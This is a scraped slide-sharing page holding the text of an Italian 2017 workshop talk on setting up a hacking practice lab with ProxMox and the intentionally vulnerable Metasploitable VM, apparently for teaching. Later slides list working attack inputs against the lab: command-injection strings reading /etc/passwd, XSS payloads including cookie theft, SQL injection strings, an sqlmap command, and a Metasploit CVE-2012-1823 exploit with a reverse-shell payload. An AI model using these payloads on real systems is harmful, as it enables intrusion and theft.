Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
 

Recently uploaded

How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
名前 です男
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
DianaGray10
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
Neo4j
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
IndexBug
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
Tomaz Bratanic
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
KAMESHS29
 

Recently uploaded (20)

How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceAI 101: An Introduction to the Basics and Impact of Artificial Intelligence
AI 101: An Introduction to the Basics and Impact of Artificial Intelligence
 
GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 

Hacking Lab con ProxMox e Metasploitable

  • 1. Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna HACKING LAB con ProxMox e Metasploitable
  • 2. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux
  • 3. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta legalità sulle tecniche sfruttate nel Hacking.
  • 4. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna ProxMox Proxmox VE is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters www.proxmox.com
  • 5. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Metasploitable Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. https://sourceforge.net/projects/metasploitable/
  • 6. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. BackBox desktop environment includes a complete set of tools required for ethical hacking and security testing. BackBox Linux backbox.org
  • 7. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Creiamo una nuova Macchina Virtuale dal Pannello Web Ricordatevelo
  • 8. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 9. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 10. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 11. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 12. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 13. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  • 14. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable $ ssh root@IP_PROXMOX # cd /var/lib/vz/images
 # mkdir 102 (ID del VM che abbiamo prima creato) # cd 102
 # wget http://bit.ly/metasploitable -O metasploitable.zip
 # unzip metasploitable.zip # cd Metasploitable2-Linux/ # mv Metasploitable.vmdk ../ # rm metasploitable.zip ./Metasploitable2-Linux/ -rf
  • 15. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable # qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 …Metasploitable.qcow2 # nano /etc/pve/qemu-server/102.conf
  • 16. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable bootdisk: ide0 ide0: file=local:102/Metasploitable.qcow2,size=8G
  • 17. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Avviamo la VM
  • 18. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable https://youtu.be/WBsCOjRQKnI
  • 19. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ nmap 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 20. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ sudo nmap -o 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec … … … Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.24 - 2.6.25 Network Distance: 2 hops Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  • 21. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Zenmap $ sudo zenmap
  • 22. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Dirsearch $ dirsearch -e php -u http://192.168.x.x [22:30:01] 200 - 112KB - /doc/ [22:30:01] 302 - 0B - /dvwa/ -> login.php [22:30:03] 200 - 891B - /index.php [22:30:05] 200 - 24KB - /mutillidae/ [22:30:05] 200 - 4KB - /phpMyAdmin/ [22:30:06] 200 - 48KB - /phpinfo.php [22:30:07] 403 - 300B - /server-status/ [22:30:08] 200 - 884B - /test/
  • 23. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA http://192.168.x.x/dvwa/ admin:password
  • 24. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Low 192.168.2.1 ; cat /etc/passwd
  • 25. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Medium 192.168.2.1 & cat /etc/passwd
  • 26. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Low <script>alert('Hello World')</script>
  • 27. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Medium <ScRiPt>alert('Hello World’)</script> <script language="javascript">alert('Hello World’)</script> <img src=x onerror="alert('Hello World')">
  • 28. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Low <script>document.write(document.cookie)</script> <iframe src=“http://www.makerstation.it/"></iframe> <meta http-equiv="refresh" content="10; url=http:// www.makerstation.it/">
  • 29. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Medium <ScRiPt>alert("Hello World 2")</script>
  • 30. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low ' or '0'='0 ' or '0'='0' union select null, version() # ' or '0'='0' union select null, database() #
  • 31. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low and SQLMap sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" -- forms --cookie="security=low; PHPSESSID=xyz"
  • 32. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Medium 0 or 1=1
  • 33. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Whatweb $ whatweb 192.168.x.x [200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered- By[PHP/5.2.4-2ubuntu5.10] $ nmap -sV --script=http-php-version 192.168.x.x |_Version from header x-powered-by: PHP/5.2.4-2 |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
  • 34. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Metasploit $ sudo metasploit # search CVE-2012-1823 # use exploit/multi/http/php_cgi_arg_injection # show options # set RHOST 192.168.x.x
 # set PAYLOAD php/meterpreter/reverse_tcp # exploit
  • 35. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Armitage
  • 36. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Q&A @AndreaDraghetti